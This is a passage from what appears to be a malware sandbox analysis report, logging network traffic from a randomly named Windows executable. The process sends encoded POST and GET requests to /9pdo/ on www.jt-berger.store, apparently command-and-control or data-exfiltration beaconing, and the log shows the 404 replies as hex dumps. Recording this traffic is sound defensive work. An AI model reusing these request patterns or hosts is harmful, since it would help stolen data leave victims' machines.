                                                                      Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449740217.160.0.183801908C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:17:18.719245911 CEST769OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.jt-berger.store
                                                                      Origin: http://www.jt-berger.store
                                                                      Referer: http://www.jt-berger.store/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 35 42 6c 33 37 6a 6c 32 32 70 45 6f 37 6b 53 4e 53 79 74 4e 57 55 5a 72 52 61 46 54 41 50 62 43 67 6c 72 2f 4b 6c 41 68 6f 37 58 49 38 70 79 68 73 57 53 64 63 58 70 47 37 48 64 76 6a 66 56 6b 54 78 7a 68 4d 57 47 6c 2b 72 4b 6b 4a 74 70 2b 2f 5a 75 31 6b 6c 36 34 66 77 7a 39 74 53 55 71 7a 49 2b 53 41 46 76 54 68 47 78 67 49 34 6f 61 49 38 4e 5a 38 56 57 43 34 7a 37 57 37 73 44 58 74 59 6e 57 68 6c 66 48 62 73 6c 75 31 30 46 44 76 68 76 72 2b 4a 63 79 43 2f 42 6e 37 37 67 4a 6c 53 34 6f 49 69 64 66 53 70 55 6d 73 55 71 62 38 54 55 71 75 61 50 32 55 6d 55 36 70 45 50 72 2b 35 4a 77 53 36 7a 66 55 39 30 3d
                                                                      Data Ascii: edR0hF=w9/X/ZL56raZ5Bl37jl22pEo7kSNSytNWUZrRaFTAPbCglr/KlAho7XI8pyhsWSdcXpG7HdvjfVkTxzhMWGl+rKkJtp+/Zu1kl64fwz9tSUqzI+SAFvThGxgI4oaI8NZ8VWC4z7W7sDXtYnWhlfHbslu10FDvhvr+JcyC/Bn77gJlS4oIidfSpUmsUqb8TUquaP2UmU6pEPr+5JwS6zfU90=
                                                                      Apr 16, 2024 17:17:18.935375929 CEST558INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Tue, 16 Apr 2024 15:17:18 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449741217.160.0.183801908C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:17:21.453392029 CEST10851OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10303
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.jt-berger.store
                                                                      Origin: http://www.jt-berger.store
                                                                      Referer: http://www.jt-berger.store/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 35 42 6c 33 37 6a 6c 32 32 70 45 6f 37 6b 53 4e 53 79 74 4e 57 55 5a 72 52 61 46 54 41 50 54 43 67 58 6a 2f 4c 47 6f 68 70 37 58 49 78 4a 79 67 73 57 54 59 63 58 68 5a 37 48 42 56 6a 5a 52 6b 54 53 37 68 5a 56 65 6c 30 72 4b 6b 42 4e 70 46 77 35 75 6b 6b 6c 4c 2f 66 77 6a 39 74 53 55 71 7a 50 4f 53 48 55 76 54 6a 47 78 6a 41 59 6f 57 43 63 4e 31 38 57 6d 30 34 7a 50 67 37 63 6a 58 73 34 33 57 6e 58 33 48 42 73 6c 6f 30 30 46 62 76 6b 32 7a 2b 4a 51 51 43 38 64 64 37 35 38 4a 67 56 5a 69 63 44 56 4c 45 36 74 2b 7a 33 32 38 2f 67 59 78 31 63 76 57 46 7a 63 46 31 58 37 36 6c 70 6f 44 48 36 6e 47 46 4e 5a 48 70 6b 45 35 76 48 79 52 49 47 76 63 47 35 73 6c 62 44 58 78 65 2f 50 50 4a 35 46 74 73 48 6a 33 64 63 74 47 53 62 64 6c 53 45 34 51 4a 6f 49 4b 34 6f 2b 77 33 76 76 32 4c 41 51 38 76 62 39 6c 71 45 59 47 63 6a 59 4b 76 64 6a 4a 75 47 77 67 62 50 6d 49 55 31 4f 66 63 39 4b 33 34 71 41 4b 79 30 34 33 65 46 6d 65 65 33 79 2b 56 4d 34 64 45 74 64 34 77 72 71 6e 39 6f 49 69 32 6b 54 6f 75 4f 76 32 68 58 73 46 78 7a 32 2f 43 39 2b 65 55 68 56 4e 31 35 69 41 67 45 42 69 57 74 63 6d 62 7a 4a 58 2b 34 68 51 49 4f 73 4d 79 31 6d 76 52 65 2f 67 6a 69 61 76 56 47 72 6e 38 50 2b 54 57 32 5a 6f 54 4d 6a 4a 49 79 32 57 71 49 2f 61 69 4a 74 36 70 69 79 65 30 4c 41 43 65 46 62 52 66 36 31 5a 31 58 54 41 66 56 63 4d 55 42 34 42 37 4d 50 49 76 47 6d 4f 59 30 69 4b 51 31 37 6c 73 41 61 66 4e 69 4f 30 52 42 36 54 68 72 37 4e 56 48 59 6f 69 52 4e 35 57 69 69 33 4d 39 78 46 50 2b 71 32 4c 4b 43 78 35 47 49 6e 30 72 71 35 4f 63 33 74 30 46 58 48 64 77 47 4a 63 46 31 76 69 4b 69 33 45 71 4d 6e 6a 74 58 52 31 77 6c 47 37 33 39 61 69 41 77 65 4c 4a 34 32 51 43 53 78 34 44 64 34 64 66 68 76 38 47 6f 52 65 53 7a 70 31 2f 58 57 6f 66 78 77 38 48 39 30 75 58 43 58 75 54 56 48 70 50 52 44 61 31 36 6d 68 69 38 37 69 42 4d 2b 6e 75 64 48 47 63 33 49 38 57 44 67 32 77 48 6c 76 4a 6a 59 63 59 4e 52 36 52 48 4c 6e 6f 55 38 39 74 2f 62 79 4c 34 6c 52 63 4c 52 33 31 61 77 68 79 53 49 63 39 2f 4c 70 75 6b 59 32 57 66 63 4d 53 4b 61 6e 4c 65 69 4c 6a 4c 71 6f 4b 65 72 6e 50 50 77 31 34 6f 57 31 33 44 47 64 35 63 42 33 51 6d 62 39 4c 2b 4b 4d 6a 66 57 6d 6e 47 59 6f 51 4d 58 31 73 51 67 44 47 74 5a 45 4a 43 61 46 42 31 70 42 4f 74 59 79 36 31 52 59 48 4a 31 6e 37 34 35 71 38 53 4c 62 36 6d 41 76 6e 6c 4f 49 48 57 33 77 46 4d 2b 37 59 6c 34 67 71 42 4f 51 66 68 6d 57 69 57 6e 39 79 72 52 55 63 64 6f 53 61 6a 6d 52 6c 35 49 54 41 34 66 4f 44 2b 4b 67 48 6c 45 50 73 6c 2b 6a 74 58 74 67 2f 30 6f 6f 45 61 7a 43 54 48 75 56 45 47 2b 45 52 7a 31 31 65 56 76 71 68 56 45 65 5a 72 35 74 5a 73 4f 70 52 6e 39 49 4b 72 71 73 78 61 76 4c 58 6e 59 67 6d 4a 4c 42 43 61 43 4a 64 58 69 2b 65 39 48 58 6b 47 51 6f 75 31 44 44 5a 4b 47 68 57 63 38 6b 4f 49 72 78 52 71 4f 36 4e 51 4f 4a 6b 4d 38 41 4a 52 6c 6a 69 5a 43 77 71 34 4c 38 31 2f 41 2b 4b 37 51 78 66 67 49 4e 76 50 50 50 72 4a 4b 69 4b 69 41 4a 64 77 42 43 70 42 4c 6c 79 30 71 76 7a 48 58 35 62 4a 57 57 41 51 6f 6a 66 43 49 62 31 5a 4f 50 65 66 77 76 4d 69 78 67 6f 41 57 56 63 46 59 36 65 2f 79 75 35 36 37 51 70 42 70 65 5a 6a 73 46 5a 32 47 72 31 67 4e 77 43 54 71 76 4d 36 62 50 4f 52 47 5a 74 4d 71 34 70 70 53 78 39 63 75 52 79 41 56 4c 61 2f 78 77 67 2f 6a 45 74 63 73 32 6a 51 71 6d 69 31 31 65 42 66 66 70 36 46 72 68 4c 52 48 78 61 68 45 63 64 6e 73 55 6a 38 6c 6b 39 50 56 71 36 4b 37 75 6c 45 6c 31 75 52 62 78 4e 51 44 61 30 6b 4c 67 73 53 67 53 77 67 36 61 34 30 4d 58 6e 54 6c 51 52 74 35 4b 59 67 75 34 70 6c 6f 46 34 75 65 77 59 33 6d 47 2f 42 57 45 45 4c 32 63 68 4d 38 33 68 55 70 68 4a 69 6e 65 32 59 33 48 4f 37 6c 6e 54 66 4d 52 55 2b 72 76 36 70 47 79 41 79 39 30 47 35 36 73 6a 6e 5a 42 6e 46 4d 30 35 34 72 72 46 50 42 74 77 63 52 74 79 65 34 66 43 64 50 79 66 48 79 44 4f 35 4b 7a 4c 78 56 47 47 6c 53 4c 31 45 6a 59 55 73 55 2b 78 46 4f 4f 6f 4e 67 61 38 4c 73 4c 48 6d 48 79 4c 6e 50 79 6f 64 41 4b 4b 46 69 77 48 45 64 57 6c 42 33 5a 53 51 30 5a 67 45 31 34 6d 37 74 76 41 35 38 2b 35 6c 4a 51 6a 6a 6d 35 35 48 71 2f 33 74 66 33 51 30 5a 4b 56 50 55
                                                                      Data Ascii: edR0hF=w9/X/ZL56raZ5Bl37jl22pEo7kSNSytNWUZrRaFTAPTCgXj/LGohp7XIxJygsWTYcXhZ7HBVjZRkTS7hZVel0rKkBNpFw5ukklL/fwj9tSUqzPOSHUvTjGxjAYoWCcN18Wm04zPg7cjXs43WnX3HBslo00Fbvk2z+JQQC8dd758JgVZicDVLE6t+z328/gYx1cvWFzcF1X76lpoDH6nGFNZHpkE5vHyRIGvcG5slbDXxe/PPJ5FtsHj3dctGSbdlSE4QJoIK4o+w3vv2LAQ8vb9lqEYGcjYKvdjJuGwgbPmIU1Ofc9K34qAKy043eFmee3y+VM4dEtd4wrqn9oIi2kTouOv2hXsFxz2/C9+eUhVN15iAgEBiWtcmbzJX+4hQIOsMy1mvRe/gjiavVGrn8P+TW2ZoTMjJIy2WqI/aiJt6piye0LACeFbRf61Z1XTAfVcMUB4B7MPIvGmOY0iKQ17lsAafNiO0RB6Thr7NVHYoiRN5Wii3M9xFP+q2LKCx5GIn0rq5Oc3t0FXHdwGJcF1viKi3EqMnjtXR1wlG739aiAweLJ42QCSx4Dd4dfhv8GoReSzp1/XWofxw8H90uXCXuTVHpPRDa16mhi87iBM+nudHGc3I8WDg2wHlvJjYcYNR6RHLnoU89t/byL4lRcLR31awhySIc9/LpukY2WfcMSKanLeiLjLqoKernPPw14oW13DGd5cB3Qmb9L+KMjfWmnGYoQMX1sQgDGtZEJCaFB1pBOtYy61RYHJ1n745q8SLb6mAvnlOIHW3wFM+7Yl4gqBOQfhmWiWn9yrRUcdoSajmRl5ITA4fOD+KgHlEPsl+jtXtg/0ooEazCTHuVEG+ERz11eVvqhVEeZr5tZsOpRn9IKrqsxavLXnYgmJLBCaCJdXi+e9HXkGQou1DDZKGhWc8kOIrxRqO6NQOJkM8AJRljiZCwq4L81/A+K7QxfgINvPPPrJKiKiAJdwBCpBLly0qvzHX5bJWWAQojfCIb1ZOPefwvMixgoAWVcFY6e/yu567QpBpeZjsFZ2Gr1gNwCTqvM6bPORGZtMq4ppSx9cuRyAVLa/xwg/jEtcs2jQqmi11eBffp6FrhLRHxahEcdnsUj8lk9PVq6K7ulEl1uRbxNQDa0kLgsSgSwg6a40MXnTlQRt5KYgu4ploF4uewY3mG/BWEEL2chM83hUphJine2Y3HO7lnTfMRU+rv6pGyAy90G56sjnZBnFM054rrFPBtwcRtye4fCdPyfHyDO5KzLxVGGlSL1EjYUsU+xFOOoNga8LsLHmHyLnPyodAKKFiwHEdWlB3ZSQ0ZgE14m7tvA58+5lJQjjm55Hq/3tf3Q0ZKVPUrjde17VZLIFIRPNojO8pN/pksj/SAWHlZ9meU5ZqqagFpQBhLtIFrI1hXujG8ml84mNM8IC6yV84frI5Xqk6G1wiQHPF6l7YOWC7+wrIUfH27kc2DCvvV0TnU/Z3NStVFDzR1JVKJ1R3Gs5MhkOVurG6wpr3krz1zFo+pTl67IysAvOPoT2AJV7EbNPYpeAMh91qZeFgxtHZD7abTYJgcx6ADISbJWipeXwkBbSOtY5I2SiKKSns5TU0e+4Os8umzoBG083yc4EK3U4+EDn8AulqbDf4px/Qfebm/SRrkIKc0E8kFyO70HwgDr5/09QSWMAjCh1te22jdc/EoJSgZe/wxEdWXuZkpv5pPjZBMd/l1LPEkGtTYQPv+Ekh/WmBkwbQBK2YBqjL12x0cW4PA3kPRhnfkJVct5Cr6zBEo2J82qCaStu3y58hwqzjs1/RGP98nTRuxEB9ql2a/6/Y6j8q+Un684ihTVt89sOuckX46VUdYyM8W26CCCrYH3EAX96egYVRujacQGcf5xstphEXsjJ86oaEAmYqKPqmPLITVWOavGeAg0pflmEeOWjbLHIP3LVPxTk4hIxrEBwpEOKGNkhKrI1+KfTsNpgc+MNMOp9ateHPJCYP7PYZWcCBwksECwny7iv+NA+eh+XZ6wr9EbxubLFehwy0IiujU2sjyb/lsP1OFyVUdYa9xyE+aEA/NSCJ9r2uD+M14o+B2bkHo15Vum7TH9vO+StvQwsPqG0bvjbOyBjBY6s85vFhekjesrnLisc6IlEYnpPSxgnoHbjENhX8GpID7C97j/7sCfefrpZA5wS+Bqb/SBToob3lI9IiofN0s4PyPPzf8coG2nMptdbtcyUZRFiy6s/L8pS4czdqnqjyr7Mj8eVi1zgEaJyLlZPFeQPpGiGlFv2jpjLOr+cjr4VfknQyP7mcJwuAyelO4SRO10QZqTbV3WkrZ/RQvUDo7GrX2mOxMtVB+9CmCdte3XZehuP6/2yp+94rGb7FIkdE+dTJ9rIG4HOlL4DjnsW8BA6gzNUcgBA1zG/U9c8VTtmJqq7HmhVVujimIbXEUqKX/idM00FHjxJIx37RYe7eoQXVGhFIN7KBW0Xd+2bbY4yQ6PHqcmufaNR9Vw5tk7vTAXOI+TZbxxmFA8pFPpBDaRc25L76tlR0awqqIUfZn2fMJBZVay/d1+4j5PBW21rhqfNZx5cRjmvMSJXQUzd1eo31EmvYSEAtoWdOrb3Lfkofv/pSJZOX7TDxLuRotT2k0MARxYaDlVJFIGtzyACm0gaNi9W3YagLJNZIZAcIk9qOOhUaz68p2vmShNB+jBUwVkK+fQK2pTY4L9sXZXF+tNQLwU2kMBYPLa1GDKx10FcWmc14b/5Gmh7fh1ZDsgzMd50q9mbZ5laWcrs/dPMDm9CCgM24TPdrz+18WkkD68T7uuRP5D+eLyVk6RuXZV/nRwCruE5yiMoBv8k8L8hsixPHSBcS3QcLCmOUivFYXGMrZf66nnbp8oO7kOSlTd5m48NM/fUY9iAiDJ89gtEuBou2taZ3DBZCcpwifGBqh8e0QD0dxV0Ra2qDJHhPQm5e8rUPfZIzO5eWSQKBl1DoOWEF8rgrMzmE9tZrHxKUNHqeml2kJhUcnTXJyUDSTTL7JQWih2atzvpQGvBdGPPY70a6dPqwOfCUrcjXvT/jNNVXgBCB7zCsSunIn2vITLm/ulk+GacL3fV5ATw3izNk/n4OUvwsyOUZRzuMxfEBNpobOKEe7SXLm2vKbXvFs9BIM/WJVrCCYQ2/4S556okX2AcXJx0nxTyxMWfuI1xtrthC676c0lzHkXFPlAkRk0+/iqdCxY+4idIO3FDn/+VgO2rXfZ6QlzIH2Uhg4SM4lLt8ohaBAghUQyTMB22mkQmTPIh01CTghLXOMUoRNXEi14LQA8aFHtMZrkGoqn086ppw4+PmmpDPcbD1YDLacyWryV15xZd33MDVCYucOGHTYhExBZpKwT5NZOMTt4iYl+5AObioOF3lx7UiOr+4CHlbAOLUYgtCzAqyfecVL86l/OJJvuBymHywT2WbM8mwH5I9FkgNlNs1TlvqnjCMcZUMMhCUY7py9EjqY+HfC3IZ99aHNygCTLZw9v/1rWCYmC2attFP+FVy7Xsu9IACviR0YnFN7S8SlG3yWKSNJIzZHehLqkPi+7cx4n+lVFVKn6l0YlFs0NaBr7Z09cqkGzseQQzXdsYPa4e86FmkyrmAF+aXzGDFBznRLxbbTc6Rg6n2KKJBWaMCPCIALZm9Iwe/6QoAhRxVW5lnVqD097Uu6g31fkXt+/Y2mg0dR+YqNGZNtlNWUVp39j+yTvJBzG1mQvO/ooF4zp/dzEOUTXLBksTBAaDHiya4KFAcXKOtyQALC95T2wX3FdoJCKT7MVfDJ3PA3lN3SdCglTkrCYJapT/GhepAjnzj0bjUFFoErPLJ/eVhOpct5Sd5diGBhM9Dzi5F+Ud9ZBN1PjbUh+FYi3zvVUQ7SMh8VNXUT1EiS/BUu+fGA3gNk2J5G9DhGsaFMVCycwMmZdExj02yPS7hiQsFO5yMUeeIl1yOClO7/SbV/UF1zfBsPDT3LqxLXWRCuB17bylvWRBvlQckgIfGgqSmThzpDWs8kp7avwf+4MY53ejXm6JAcBVi2qp/f+w6tQ06NWkYlv0f/M7Usvt9uMMSVzVsU6+1iYReEzns/uF
                                                                      Apr 16, 2024 17:17:21.670352936 CEST558INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Tue, 16 Apr 2024 15:17:21 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449742217.160.0.183801908C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:17:24.191987991 CEST475OUTGET /9pdo/?edR0hF=9/X38tn9qLO2xSF02XNB/rY3zD6RCSMCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFniev+GXC9dB/42VqWS3YgLMlW8u3PKxI03yuVQ=&jzuh=7Bfls2 HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      Host: www.jt-berger.store
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Apr 16, 2024 17:17:24.407860041 CEST745INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Content-Length: 601
                                                                      Connection: close
                                                                      Date: Tue, 16 Apr 2024 15:17:24 GMT
                                                                      Server: Apache
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.449743219.94.128.41801908C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:17:30.316589117 CEST752OUTPOST /9pdo/ HTTP/1.1
